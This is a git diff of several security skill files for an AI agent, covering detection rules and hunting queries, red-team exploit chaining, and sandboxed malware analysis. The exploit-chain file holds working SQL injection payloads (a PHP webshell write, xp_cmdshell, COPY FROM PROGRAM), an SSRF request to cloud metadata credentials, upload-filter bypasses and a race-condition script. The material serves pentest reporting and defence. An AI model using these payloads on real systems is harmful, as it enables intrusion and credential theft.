+TargetObject="*\\Software\\Microsoft\\Windows\\CurrentVersion\\Run*"
+(Details="*\\AppData\\Local\\Temp\\*" OR Details="*\\Users\\Public\\*" OR Details="*\\ProgramData\\*")
+| table _time, ComputerName, TargetObject, Details
+| sort -_time
+```
+
+**Hunt for Outbound Connections to Rare Destinations:**
+```spl
+index=network
+| stats count by dest_ip
+| where count < 5
+| join dest_ip [search index=network]
+| table _time, src_ip, dest_ip, dest_port, bytes_out
+```
+
+### Elastic (KQL) Hunting Queries
+
+**Hunt for Process Injection:**
+```
+event.code:8 AND
+winlog.event_data.TargetImage:(*\\explorer.exe OR *\\svchost.exe) AND
+NOT winlog.event_data.SourceImage:C\\:\\Windows\\System32\\*
+```
+
+**Hunt for Suspicious File Creations:**
+```
+event.code:11 AND
+file.path:(*\\AppData\\Local\\Temp\\*.exe OR *\\Users\\Public\\*.exe) AND
+NOT process.executable:(*\\Windows\\System32\\* OR *\\Program Files\\*)
+```
+
+### EDR Hunting (Generic Pseudocode)
+
+**Hunt for Credential Access:**
+```
+Process = "lsass.exe" AND
+AccessMask IN (0x1010, 0x1410, 0x1438) AND
+SourceImage NOT IN (known_good_processes)
+```
+
+**Hunt for Lateral Movement:**
+```
+Process = "psexec.exe" OR
+Process = "wmic.exe" OR
+(Process = "powershell.exe" AND CommandLine CONTAINS "Invoke-Command")
+```
+
+---
+
+## IOC Formats & Standards
+
+### STIX (Structured Threat Information Expression)
+
+**STIX 2.1 Example:**
+```json
+{
+  "type": "indicator",
+  "spec_version": "2.1",
+  "id": "indicator--12345678-1234-1234-1234-123456789abc",
+  "created": "2025-10-26T12:00:00.000Z",
+  "modified": "2025-10-26T12:00:00.000Z",
+  "name": "Malicious Domain: malicious.com",
+  "description": "C2 domain for Malware Family X",
+  "pattern": "[domain-name:value = 'malicious.com']",
+  "pattern_type": "stix",
+  "valid_from": "2025-10-26T12:00:00.000Z",
+  "labels": ["malicious-activity"]
+}
+```
+
+### CSV Format (Simple)
+
+```csv
+ioc_type,ioc_value,confidence,description,first_seen
+domain,malicious.com,high,C2 server,2025-10-26
+ip,192.168.1.100,medium,C2 IP address,2025-10-26
+sha256,abc123...,high,Malware sample hash,2025-10-26
+mutex,Global\M12345,high,Mutex name,2025-10-26
+registry,HKCU\Software\...\Run,high,Persistence key,2025-10-26
+```
+
+### OpenIOC Format
+
+```xml
+<?xml version="1.0" encoding="UTF-8"?>
+<ioc xmlns="http://schemas.mandiant.com/2010/ioc">
+  <short_description>Malware Family X IOCs</short_description>
+  <description>IOCs from analysis of Malware Family X</description>
+  <authored_by>Analyst Name</authored_by>
+  <authored_date>2025-10-26T12:00:00</authored_date>
+  <definition>
+    <Indicator operator="OR">
+      <IndicatorItem>
+        <Context document="FileItem" search="FileItem/Md5sum"/>
+        <Content type="md5">abc123...</Content>
+      </IndicatorItem>
+      <IndicatorItem>
+        <Context document="Network" search="Network/DNS"/>
+        <Content type="string">malicious.com</Content>
+      </IndicatorItem>
+    </Indicator>
+  </definition>
+</ioc>
+```
+
+---
+
+## Detection Logic Development
+
+### From Analysis to Detection
+
+**Step 1: Identify Unique Behaviors**
+From dynamic analysis, extract behaviors that are:
+- Uncommon in legitimate software
+- Hard for attackers to change
+- Observable in logs/network traffic
+
+**Step 2: Map to Data Sources**
+
+| Behavior | Data Source | Detection Method |
+|----------|-------------|------------------|
+| Process injection | Sysmon Event ID 8 | Sigma rule |
+| C2 beacon | Network logs, proxy | Suricata rule |
+| Registry persistence | Sysmon Event ID 13 | Sigma rule |
+| File drop | Sysmon Event ID 11 | Sigma rule + YARA |
+| DNS query (DGA) | DNS logs | Suricata rule |
+
+**Step 3: Write Detection Rule**
+
+Choose appropriate rule type:
+- **Host-based** → Sigma rule (SIEM/EDR)
+- **Network-based** → Suricata rule (IDS/IPS)
+- **File-based** → YARA rule (scanning)
+
+**Step 4: Test & Validate**
+
+- Test on malware sample (must alert)
+- Test on benign samples (must not alert)
+- Adjust thresholds/conditions
+- Document false positive scenarios
+
+**Step 5: Deploy & Tune**
+
+- Deploy to pilot environment
+- Monitor alert volume
+- Investigate false positives
+- Tune rule based on feedback
+- Document tuning changes
+
+---
+
+## Quality Checklist
+
+Before finalizing detection content:
+
+**Sigma Rules:**
+- [ ] Unique UUID assigned
+- [ ] MITRE ATT&CK tags included
+- [ ] Tested on sample data
+- [ ] False positives documented
+- [ ] Appropriate severity level set
+- [ ] References included
+- [ ] Logsource correctly specified
+
+**Suricata Rules:**
+- [ ] Unique SID assigned (1000000+)
+- [ ] Tested on PCAP
+- [ ] Flow keywords used (performance)
+- [ ] Metadata included
+- [ ] No syntax errors (suricata -T)
+- [ ] Tested on benign traffic
+- [ ] Message clearly describes detection
+
+**IOCs:**
+- [ ] All IOCs defanged properly
+- [ ] Confidence levels assigned
+- [ ] Volatility assessed
+- [ ] Context provided for each IOC
+- [ ] No environment-specific artifacts
+- [ ] Timestamps included (UTC)
+- [ ] Format standardized (CSV/STIX/OpenIOC)
+
+**Hunting Queries:**
+- [ ] Query tested and returns results
+- [ ] Performance acceptable (<30s)
+- [ ] Results actionable
+- [ ] False positive rate acceptable
+- [ ] Query documented (purpose, expected results)
+
+---
+
+## Integration with Malware Reports
+
+Detection content appears in multiple report sections:
+
+**IOCs Section:**
+- Defanged IOCs grouped by type
+- Confidence ratings
+- Context for each indicator
+
+**Detection Rules Section:**
+- YARA rules (from malware-report-writer skill)
+- Sigma rules (from this skill)
+- Suricata rules (from this skill)
+
+**Remediation Section:**
+- Hunting queries for IR teams
+- Detection deployment guidance
+- IOC search instructions
+
+**Appendix:**
+- IOC export files (CSV, STIX)
+- Sigma rule files (.yml)
+- Suricata rule files (.rules)
+
+---
+
+## Tool Quick Reference
+
+| Task | Tool | Command |
+|------|------|---------|
+| **Defang IOCs** | ioc-fanger | `echo "http://evil.com" | fanger --defang` |
+| **Convert Sigma** | sigma-cli | `sigma convert -t splunk rule.yml` |
+| **Test Suricata** | suricata | `suricata -T -S rules.rules` |
+| **Generate UUID** | uuidgen | `uuidgen` (Linux/Mac) or online |
+| **Validate STIX** | stix2-validator | `stix2_validator file.json` |
+
+---
+
+## Example Usage
+
+**User request:** "Help me create detection rules for this ransomware that encrypts files with .locked extension"
+
+**Workflow:**
+1. **Defang IOCs** from analysis (C2 domain, IP, file paths)
+2. **Create Sigma rule** for file encryption behavior (Sysmon Event ID 11)
+3. **Create Suricata rule** for C2 communication pattern
+4. **Generate hunting query** to find encrypted files across environment
+5. **Export IOCs** in CSV format for SOC import
+6. **Document** all rules with context and testing notes
+7. **Provide** deployment guidance for blue team

--- a/skills/detection-engineer/SKILL.md
+++ b/skills/detection-engineer/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: detection-engineer
-description: Create detection rules and hunting queries from malware analysis findings. Use when you need to write Sigma rules for SIEM, Suricata rules for network IDS, defang IOCs for safe sharing, or convert analysis findings into actionable detection content for SOC teams and threat hunters.
-category: blue-team
+description: "Create detection rules from malware analysis findings. Trigger: writing Sigma/Suricata rules, defanging IOCs, or generating hunting queries for SOC teams."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Detection Engineer
@@ -795,3 +798,14 @@ Detection content appears in multiple report sections:
 5. **Export IOCs** in CSV format for SOC import
 6. **Document** all rules with context and testing notes
 7. **Provide** deployment guidance for blue team
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Sigma test**: Validate all 4 Sigma rule YAML examples parse correctly with required fields (title, id, logsource, detection, condition, level).
+3. **Suricata test**: Check all 4 Suricata rule examples have valid syntax (action, protocol, direction, sid, rev).
+4. **Defang test**: Verify defanging patterns correctly transform URLs, domains, IPs, and emails.
+5. **Hunting query test**: Confirm Splunk and KQL hunting queries are syntactically valid.
+6. **Integration test**: Confirm referenced skills (malware-report-writer, malware-triage) exist.

--- a/skills/exploit-chain-patterns/SKILL.md
+++ b/skills/exploit-chain-patterns/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: exploit-chain-patterns
-description: Exploit chaining methodology for combining multiple low/medium-severity vulnerabilities into high-impact attack paths. Use when analyzing pentest findings to identify chained exploitation opportunities, escalate impact through vulnerability combinations, and demonstrate real-world attack scenarios.
-category: red-team
+description: "Chain vulnerabilities into high-impact attack paths. Trigger: analyzing pentest findings for exploit chains, escalating impact, or showing attack scenarios."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Exploit Chain Patterns
@@ -394,3 +397,13 @@ Recommended: Fix SSRF (#2) - breaks the most chains
 - **detection-engineer** - Create detection rules for each chain step
 - **waf-detection-bypass** - WAF bypass may be required to execute chain steps
 - **pentest-orchestrator** - Chains are identified during orchestrated scan phases
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Chain catalog test**: Verify all 10 chain patterns render correctly with proper code blocks and ASCII diagrams.
+3. **SQL payload test**: Check that all SQL injection chain payloads are syntactically valid for their respective database engines.
+4. **Methodology test**: Validate the adjacency matrix and chain scoring formulas are documented correctly.
+5. **Integration test**: Confirm referenced skills (ai-pentesting-validation, detection-engineer, waf-detection-bypass, pentest-orchestrator) exist.

--- a/skills/exploit-chain-patterns/SKILL.md
+++ b/skills/exploit-chain-patterns/SKILL.md
@@ -1,0 +1,396 @@
+---
+name: exploit-chain-patterns
+description: Exploit chaining methodology for combining multiple low/medium-severity vulnerabilities into high-impact attack paths. Use when analyzing pentest findings to identify chained exploitation opportunities, escalate impact through vulnerability combinations, and demonstrate real-world attack scenarios.
+category: red-team
+---
+
+# Exploit Chain Patterns
+
+Combine individual vulnerabilities into multi-step attack chains that demonstrate real-world impact beyond what each finding shows in isolation.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Identify **chaining opportunities** from a list of pentest findings
+- Escalate **low/medium findings** into **high/critical** attack paths
+- Demonstrate **business impact** through realistic attack scenarios
+- Build **attack graphs** showing vulnerability relationships
+- Prioritize remediation based on **chain-breaking** potential
+- Write **proof-of-concept chains** for penetration test reports
+
+## Why Chains Matter
+
+A single medium-severity SSRF alone might get deprioritized. But SSRF → internal API access → admin token leak → full account takeover is a **critical** finding that demands immediate action.
+
+**Individual findings are puzzle pieces. Chains show the full picture.**
+
+## Chain Rule Catalog
+
+### 10 Core Chain Patterns
+
+#### 1. SSRF → Internal Service Access
+
+```
+SSRF on external endpoint
+    │
+    ▼
+Access internal services (169.254.169.254, 10.x.x.x, 127.0.0.1)
+    │
+    ▼
+Read cloud metadata / internal APIs / admin panels
+    │
+    ▼
+Extract credentials, tokens, or sensitive configuration
+```
+
+**Detection signals:**
+- SSRF finding exists on any endpoint accepting URLs
+- Target infrastructure uses cloud providers (AWS/GCP/Azure)
+- Internal services accessible without authentication from server-side
+
+**Example chain:**
+```
+1. SSRF via image URL parameter: POST /api/render?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
+2. AWS IAM role credentials returned in response
+3. Use temporary credentials to access S3 buckets, EC2 instances
+Impact: Full cloud infrastructure compromise from single SSRF
+```
+
+#### 2. SQLi → Database-Specific Escalation
+
+```
+SQL Injection (any type)
+    │
+    ▼
+Identify database engine (MySQL, PostgreSQL, MSSQL, Oracle)
+    │
+    ▼
+Engine-specific escalation
+    ├── MySQL: FILE privilege → read/write files → webshell
+    ├── PostgreSQL: COPY TO/FROM → file read/write → RCE via extensions
+    ├── MSSQL: xp_cmdshell → OS command execution
+    └── Oracle: Java stored procedures → OS command execution
+```
+
+**Chain payloads per engine:**
+```sql
+-- MySQL: Read files
+' UNION SELECT LOAD_FILE('/etc/passwd'),2,3-- -
+
+-- MySQL: Write webshell (needs FILE privilege)
+' UNION SELECT '<?php system($_GET["cmd"]); ?>',2,3 INTO OUTFILE '/var/www/html/shell.php'-- -
+
+-- PostgreSQL: Command execution
+'; CREATE TABLE cmd_exec(cmd_output text); COPY cmd_exec FROM PROGRAM 'id'; SELECT * FROM cmd_exec;-- -
+
+-- MSSQL: Enable and use xp_cmdshell
+'; EXEC sp_configure 'xp_cmdshell', 1; RECONFIGURE; EXEC xp_cmdshell 'whoami';-- -
+```
+
+#### 3. XSS → Session Hijack → Account Takeover
+
+```
+Stored/Reflected XSS
+    │
+    ▼
+Steal session cookie or JWT token
+    │
+    ▼
+Replay token to impersonate victim
+    │
+    ▼
+If victim is admin → full application takeover
+```
+
+**Prerequisites for chain to work:**
+- Cookie WITHOUT `HttpOnly` flag, OR
+- JWT stored in `localStorage` (accessible via XSS)
+- No additional session binding (IP, fingerprint)
+
+**Chain breakers (defenses that stop this):**
+- `HttpOnly` cookie flag → XSS can't read cookies
+- `SameSite=Strict` → Cookie not sent cross-origin
+- CSP `script-src 'self'` → Blocks inline script execution
+- Session bound to IP/User-Agent → Stolen token rejected
+
+#### 4. IDOR → Horizontal/Vertical Privilege Escalation
+
+```
+IDOR on user resources (e.g., /api/users/123/profile)
+    │
+    ▼
+Enumerate other user IDs (sequential, predictable)
+    │
+    ▼
+Access/modify other users' data
+    │
+    ▼
+If admin IDs are predictable → access admin resources
+    │
+    ▼
+Vertical escalation: regular user → admin
+```
+
+**Signals that IDOR chains are possible:**
+- Sequential numeric IDs (1, 2, 3...)
+- UUIDs returned in other API responses (info leak → IDOR)
+- Different HTTP methods on same endpoint (GET works, also try PUT/DELETE)
+- API versioning differences (v1 has auth, v2 doesn't)
+
+#### 5. Open Redirect → OAuth Token Theft
+
+```
+Open redirect on trusted domain
+    │
+    ▼
+Abuse as OAuth redirect_uri (bypasses allowlist via subdomain/path)
+    │
+    ▼
+Victim authorizes OAuth flow
+    │
+    ▼
+Authorization code/token sent to attacker-controlled URL
+    │
+    ▼
+Full account takeover via OAuth
+```
+
+**Why this works:**
+- OAuth providers often allowlist entire domains
+- Open redirect on `trusted-app.com/redirect?url=evil.com`
+- OAuth callback goes to `trusted-app.com/redirect?url=evil.com#access_token=...`
+
+#### 6. Information Disclosure → Targeted Exploitation
+
+```
+Info disclosure (stack traces, debug pages, API docs, .env files)
+    │
+    ▼
+Extract: framework version, library versions, API keys, internal IPs
+    │
+    ▼
+Search for known CVEs matching exact versions
+    │
+    ▼
+Targeted exploitation with version-specific exploits
+```
+
+**Common info leak sources:**
+- Error pages with stack traces (framework + version)
+- `/debug`, `/actuator`, `/swagger.json`, `/.env`
+- HTTP headers: `Server`, `X-Powered-By`, `X-AspNet-Version`
+- JavaScript source maps exposing frontend dependencies
+
+#### 7. File Upload → Webshell → RCE
+
+```
+Unrestricted file upload
+    │
+    ▼
+Upload executable file (.php, .jsp, .aspx, .py)
+    │
+    ▼
+Determine upload path (via response, directory listing, or brute force)
+    │
+    ▼
+Access uploaded file via web → code execution on server
+```
+
+**Bypass techniques when filters exist:**
+- Double extension: `shell.php.jpg`
+- Null byte (legacy): `shell.php%00.jpg`
+- Content-Type spoof: Upload .php with `image/jpeg` Content-Type
+- Case variation: `shell.PhP`, `shell.pHtml`
+- Alternative extensions: `.phtml`, `.php5`, `.shtml`, `.asa`
+
+#### 8. CORS Misconfiguration → Data Exfiltration
+
+```
+Permissive CORS (Access-Control-Allow-Origin: *)
+    │
+    ▼
+OR reflected origin (echoes any Origin header)
+    │
+    ▼
+Attacker page makes authenticated cross-origin requests
+    │
+    ▼
+Victim's browser sends cookies → response readable by attacker
+    │
+    ▼
+Exfiltrate sensitive data (PII, tokens, financial data)
+```
+
+**Testing:**
+```bash
+# Test for reflected origin
+curl -H "Origin: https://evil.com" -I https://target.com/api/sensitive
+# If response contains: Access-Control-Allow-Origin: https://evil.com
+# AND: Access-Control-Allow-Credentials: true
+# → VULNERABLE to authenticated data theft
+```
+
+#### 9. Subdomain Takeover → Credential Phishing
+
+```
+Dangling DNS record (CNAME to deprovisioned service)
+    │
+    ▼
+Claim the service (Heroku, S3, GitHub Pages, Azure, etc.)
+    │
+    ▼
+Host phishing page on trusted subdomain
+    │
+    ▼
+Victims trust *.company.com → enter credentials
+    │
+    ▼
+Also: set cookies on parent domain → session fixation
+```
+
+**Services commonly vulnerable:**
+- AWS S3 (`NoSuchBucket` response)
+- Heroku (`No such app` response)
+- GitHub Pages (404 from GitHub)
+- Azure (`NXDOMAIN` but CNAME still points)
+- Shopify, Fastly, Pantheon
+
+#### 10. Race Condition → Business Logic Abuse
+
+```
+Time-of-check to time-of-use (TOCTOU) gap
+    │
+    ▼
+Send multiple concurrent requests
+    │
+    ▼
+Bypass: rate limits, balance checks, inventory counts, coupon usage
+    │
+    ▼
+Result: double-spend, free items, unlimited coupon use
+```
+
+**Testing pattern:**
+```python
+import asyncio
+import aiohttp
+
+async def race_request(session, url, data):
+    async with session.post(url, json=data) as resp:
+        return await resp.json()
+
+async def exploit_race():
+    async with aiohttp.ClientSession() as session:
+        # Send 20 concurrent requests
+        tasks = [race_request(session, url, payload) for _ in range(20)]
+        results = await asyncio.gather(*tasks)
+        # Check how many succeeded (should be 1, if >1 → race condition)
+```
+
+## Chain Analysis Methodology
+
+### Step 1: Inventory All Findings
+
+Create a table of all discovered vulnerabilities:
+
+| ID | Type | Endpoint | Severity | Verified |
+|----|------|----------|----------|----------|
+| F1 | SSRF | /api/fetch | Medium | Yes |
+| F2 | Info Disclosure | /debug | Low | Yes |
+| F3 | IDOR | /api/users/{id} | Medium | Yes |
+
+### Step 2: Build Adjacency Matrix
+
+For each pair of findings, ask: "Can finding A enable or amplify finding B?"
+
+```
+     F1   F2   F3
+F1   -    YES  NO
+F2   YES  -    YES
+F3   NO   NO   -
+```
+
+### Step 3: Trace Chain Paths
+
+Follow the adjacency matrix to find multi-step paths:
+- F2 (info disclosure reveals internal IPs) → F1 (SSRF targets internal IPs) → Data exfiltration
+- F2 (info disclosure reveals user IDs) → F3 (IDOR accesses other users)
+
+### Step 4: Score Chain Impact
+
+```
+Chain Impact = max(individual severities) + chain_bonus
+
+chain_bonus:
+  2-step chain: +1 severity level
+  3-step chain: +2 severity levels
+  Achieves RCE: automatic Critical
+  Achieves data exfiltration: minimum High
+  Achieves privilege escalation: minimum High
+```
+
+### Step 5: Identify Chain Breakers
+
+For each chain, identify which single fix would break the entire chain. This helps prioritize remediation.
+
+```
+Chain: Info Disclosure → SSRF → Cloud Metadata → Account Takeover
+Chain breakers:
+  1. Fix info disclosure (remove /debug endpoint) → breaks step 1
+  2. Fix SSRF (validate/allowlist URLs) → breaks step 2
+  3. Use IMDSv2 on AWS (requires token) → breaks step 3
+
+Recommended: Fix SSRF (#2) - breaks the most chains
+```
+
+## Reporting Chains
+
+### Chain Report Template
+
+```markdown
+## Attack Chain: [Name]
+
+**Impact:** [Critical/High/Medium]
+**Chain Length:** [N steps]
+**MITRE ATT&CK:** [Technique IDs]
+
+### Attack Path
+
+1. **[Step 1 Title]** (Finding ID: F1)
+   - Endpoint: `POST /api/fetch`
+   - Payload: `url=http://169.254.169.254/...`
+   - Result: AWS credentials obtained
+
+2. **[Step 2 Title]** (Finding ID: F2)
+   - Using: Credentials from Step 1
+   - Action: `aws s3 ls` with stolen credentials
+   - Result: Access to production S3 buckets
+
+### Business Impact
+[Describe what an attacker achieves at the end of this chain]
+
+### Remediation Priority
+| Fix | Breaks Chain At | Effort | Recommendation |
+|-----|-----------------|--------|----------------|
+| Fix SSRF | Step 1 | Medium | **Priority 1** |
+| IMDSv2 | Step 1→2 | Low | Priority 2 |
+| Least privilege IAM | Step 2 | Medium | Priority 3 |
+```
+
+## Quality Checklist
+
+- [ ] All individual findings in the chain are validated (see ai-pentesting-validation)
+- [ ] Each chain step has been tested and proven to work
+- [ ] Chain steps are in correct order (each step requires the previous)
+- [ ] Impact assessment reflects the FULL chain, not individual findings
+- [ ] Chain breakers identified for each chain
+- [ ] Remediation prioritized by chain-breaking potential
+- [ ] MITRE ATT&CK techniques mapped for each step
+- [ ] Proof-of-concept demonstrates the complete chain (or explains why partial)
+
+## Integration Points
+
+- **ai-pentesting-validation** - Each finding in the chain must pass validation first
+- **detection-engineer** - Create detection rules for each chain step
+- **waf-detection-bypass** - WAF bypass may be required to execute chain steps
+- **pentest-orchestrator** - Chains are identified during orchestrated scan phases

--- a/skills/malware-dynamic-analysis/SKILL.md
+++ b/skills/malware-dynamic-analysis/SKILL.md
@@ -1,7 +1,10 @@
 ---
 name: malware-dynamic-analysis
-description: Execute and monitor malware in controlled sandbox environments. Use when you need to observe runtime behavior, capture network traffic, monitor process activity, analyze file/registry changes, or understand actual malware functionality beyond static analysis. Guides safe execution with Procmon, Wireshark, Process Hacker, Sysmon, and automated sandboxes.
-category: soc
+description: "Execute and monitor malware in sandbox environments. Trigger: observing runtime behavior, capturing network traffic, or analyzing process and file activity."
+license: Apache-2.0
+metadata:
+  author: gentleman-programming
+  version: "1.0"
 ---
 
 # Malware Dynamic Analysis
@@ -506,3 +509,15 @@ Use findings to:
 8. Generate behavioral IOCs
 9. Create timeline of execution
 10. Prepare findings for report integration
+
+## Validation
+
+To verify this skill works correctly:
+
+1. **Load test**: Confirm the skill loads without frontmatter parsing errors.
+2. **Safety test**: Verify the pre-execution checklist has all 8 required safety items.
+3. **Phase test**: Check all 10 analysis phases (Preparation through Cleanup) are documented with correct tool commands.
+4. **Procmon test**: Validate Procmon filter syntax and file/registry operation descriptions are accurate.
+5. **Network test**: Verify Wireshark display filters and tshark extraction commands are syntactically correct.
+6. **Sysmon test**: Confirm all key Event IDs are documented with correct descriptions.
+7. **Integration test**: Confirm referenced skills (malware-triage, malware-report-writer, detection-engineer) exist.

--- a/skills/malware-dynamic-analysis/SKILL.md
+++ b/skills/malware-dynamic-analysis/SKILL.md
@@ -1,0 +1,508 @@
+---
+name: malware-dynamic-analysis
+description: Execute and monitor malware in controlled sandbox environments. Use when you need to observe runtime behavior, capture network traffic, monitor process activity, analyze file/registry changes, or understand actual malware functionality beyond static analysis. Guides safe execution with Procmon, Wireshark, Process Hacker, Sysmon, and automated sandboxes.
+category: soc
+---
+
+# Malware Dynamic Analysis
+
+Safely execute and comprehensively monitor malware behavior in isolated environments for professional malware research and enterprise security operations.
+
+## When to Use This Skill
+
+Use this skill when you need to:
+- Execute malware safely in an isolated environment
+- Monitor runtime behavior (processes, files, registry, network)
+- Capture and analyze network traffic and C2 communications
+- Validate hypotheses from static analysis
+- Extract runtime-decrypted strings or configurations
+- Document actual malware functionality for reports
+- Create behavioral IOCs and detection signatures
+- Analyze process injection and code execution techniques
+
+## Safety First - Pre-Execution Checklist
+
+**CRITICAL:** Never execute malware outside a properly isolated environment.
+
+Before ANY execution:
+- [ ] Snapshot taken of clean VM state
+- [ ] Network isolated (host-only or INetSim simulation)
+- [ ] No shared folders enabled
+- [ ] No clipboard sharing
+- [ ] Time sync disabled
+- [ ] Monitoring tools ready and running
+- [ ] Analysis persona active (no personal info)
+- [ ] Emergency shutdown plan ready
+
+**If ANY checkbox fails - DO NOT EXECUTE**
+
+## Dynamic Analysis Workflow
+
+### Phase 1: Environment Preparation (10 minutes)
+
+**1. Verify VM Isolation:**
+```bash
+# Check network adapter settings
+# Should be: Host-only or NAT with INetSim
+
+# Test internet connectivity (should fail or hit INetSim)
+ping 8.8.8.8
+nslookup google.com
+
+# Verify no shared folders
+net use  # Windows
+df -h    # Linux
+```
+
+**2. Start Monitoring Tools:**
+
+Launch in this order:
+1. **Procmon** (Process Monitor) - File/Registry/Process activity
+2. **Wireshark** - Network traffic capture
+3. **Process Hacker** - Process/memory monitoring
+4. **Regshot** - Take "before" snapshot (optional)
+
+**3. Establish Baseline:**
+- Take note of running processes
+- Document open network connections
+- Record current registry state (if using Regshot)
+
+### Phase 2: Malware Execution (Variable Duration)
+
+**Execute the Sample:**
+
+```powershell
+# For PE executables
+.\sample.exe
+
+# With arguments (if required)
+.\sample.exe /install /silent
+
+# For DLLs
+rundll32.exe sample.dll,DllMain
+rundll32.exe sample.dll,ExportedFunction
+
+# For scripts
+powershell.exe -ExecutionPolicy Bypass -File sample.ps1
+cscript.exe //NoLogo sample.vbs
+wscript.exe sample.js
+```
+
+**Observation Duration:**
+- **Minimum:** 5 minutes (most malware acts quickly)
+- **Standard:** 15 minutes (catch delayed execution)
+- **Extended:** 60+ minutes (for time-based evasion)
+
+**What to Watch:**
+- New processes spawned
+- Network connections initiated
+- Files created/modified/deleted
+- Registry keys modified
+- CPU/Memory usage spikes
+- Pop-ups or UI changes
+- Error messages
+
+### Phase 3: Process Monitoring
+
+**Using Process Hacker:**
+
+**Track New Processes:**
+1. Watch for new entries in process list
+2. Note parent-child relationships
+3. Document command-line arguments
+4. Check process integrity levels
+5. Monitor memory allocations
+
+**Identify Process Injection:**
+- Look for RWX (Read-Write-Execute) memory regions
+- Check for threads in unexpected processes
+- Monitor for process hollowing indicators
+- Watch for CreateRemoteThread calls
+
+**Memory Analysis:**
+```
+Right-click process → Memory → Inspect
+Look for:
+- Suspicious memory regions (RWX permissions)
+- Injected DLLs (not in system path)
+- Decoded strings in memory
+- Configuration data
+
+Right-click process → Create Dump File
+→ Save for later Volatility analysis
+```
+
+### Phase 4: File System Monitoring
+
+**Using Procmon (Process Monitor):**
+
+**Configure Filters:**
+```
+Filter → Add:
+- Process Name → is → sample.exe → Include
+- Operation → contains → File → Include
+- Operation → contains → Reg → Include
+- Process Name → is → explorer.exe → Exclude
+- Process Name → is → svchost.exe → Exclude (unless suspicious)
+```
+
+**Monitor File Operations:**
+
+Look for:
+- **CreateFile** - Files being created
+- **WriteFile** - Files being modified
+- **DeleteFile** - Files being deleted
+- **SetRenameInformationFile** - Files being renamed
+
+**Key Locations to Watch:**
+```
+C:\Users\<user>\AppData\Local\Temp\
+C:\Users\<user>\AppData\Roaming\
+C:\ProgramData\
+C:\Windows\Temp\
+C:\Users\<user>\AppData\Local\
+```
+
+**Extract Dropped Files:**
+```powershell
+# Find recently created files (last 5 minutes)
+Get-ChildItem -Path C:\ -Recurse -ErrorAction SilentlyContinue |
+  Where-Object {$_.CreationTime -gt (Get-Date).AddMinutes(-5)}
+
+# Hash all dropped files
+Get-ChildItem -Path C:\Users\<user>\AppData\Local\Temp\ |
+  Get-FileHash -Algorithm SHA256 |
+  Format-Table Hash, Path
+```
+
+### Phase 5: Registry Monitoring
+
+**Using Procmon:**
+
+**Filter for Registry Operations:**
+```
+Operation → contains → Reg → Include
+```
+
+**Common Registry Operations:**
+- **RegCreateKey** - Creating new keys
+- **RegSetValue** - Writing values
+- **RegQueryValue** - Reading values
+- **RegDeleteKey** - Deleting keys
+
+**Critical Registry Locations:**
+
+**Persistence Mechanisms:**
+```
+HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+HKLM\System\CurrentControlSet\Services (new services)
+```
+
+### Phase 6: Network Behavior Analysis
+
+**Using Wireshark:**
+
+**Display Filters:**
+```
+# DNS queries
+dns
+
+# HTTP traffic
+http
+
+# HTTPS/TLS
+tls
+
+# Specific IP address
+ip.addr == 192.168.1.100
+
+# Specific port
+tcp.port == 443 || udp.port == 443
+```
+
+**What to Capture:**
+
+**DNS Queries:**
+```bash
+# Extract all DNS queries
+tshark -r capture.pcapng -Y dns.qry.name -T fields -e dns.qry.name | sort -u
+
+Look for:
+- Domain names contacted
+- DGA (Domain Generation Algorithm) patterns
+- Fast-flux DNS indicators
+- Known C2 domains
+```
+
+**HTTP/HTTPS Traffic:**
+```bash
+# Extract HTTP requests
+tshark -r capture.pcapng -Y http.request -T fields -e http.host -e http.request.uri
+
+Look for:
+- C2 server URLs
+- Download locations
+- POST data (exfiltration)
+- Suspicious User-Agents
+- Beacon patterns (regular intervals)
+```
+
+**Extract Network IOCs:**
+```bash
+# All contacted IPs
+tshark -r capture.pcapng -T fields -e ip.dst | sort -u | grep -v "192.168\|10.0\|127.0"
+
+# All contacted domains
+tshark -r capture.pcapng -Y dns -T fields -e dns.qry.name | sort -u
+```
+
+### Phase 7: Advanced Monitoring
+
+**Using Sysmon (Windows Event Logging):**
+
+**Setup:**
+```powershell
+# Install with SwiftOnSecurity config
+sysmon64.exe -accepteula -i sysmonconfig.xml
+```
+
+**Key Event IDs:**
+- **Event ID 1** - Process Creation
+- **Event ID 3** - Network Connection
+- **Event ID 5** - Process Terminated
+- **Event ID 7** - Image Loaded (DLL)
+- **Event ID 8** - CreateRemoteThread (injection)
+- **Event ID 10** - Process Access
+- **Event ID 11** - File Created
+- **Event ID 12/13** - Registry Events
+
+### Phase 8: Persistence Analysis
+
+**Check All Persistence Mechanisms:**
+
+**Run Keys:**
+```powershell
+Get-ItemProperty -Path "HKCU:\Software\Microsoft\Windows\CurrentVersion\Run"
+Get-ItemProperty -Path "HKLM:\Software\Microsoft\Windows\CurrentVersion\Run"
+```
+
+**Scheduled Tasks:**
+```powershell
+Get-ScheduledTask | Where-Object {$_.TaskName -notlike "Microsoft*"} | Format-Table
+```
+
+**Services:**
+```powershell
+Get-Service | Where-Object {$_.StartType -ne "Disabled"} | Format-Table
+```
+
+### Phase 9: Artifact Collection
+
+**Export All Evidence:**
+
+**Process Monitor:**
+```
+File → Save → All Events → CSV format
+→ Save as: procmon_output.csv
+```
+
+**Wireshark:**
+```
+File → Export Specified Packets → All packets
+→ Save as: network_capture.pcapng
+```
+
+**Process Hacker:**
+```
+File → Save All → processes.txt
+(Optional) Right-click process → Create dump file → memory_dump.dmp
+```
+
+**Dropped Files:**
+```powershell
+# Copy all dropped files with hashes
+$evidence = "C:\evidence\dropped_files"
+New-Item -Path $evidence -ItemType Directory -Force
+
+Get-ChildItem -Path "C:\Users\<user>\AppData\Local\Temp" |
+  ForEach-Object {
+    Copy-Item $_.FullName -Destination $evidence
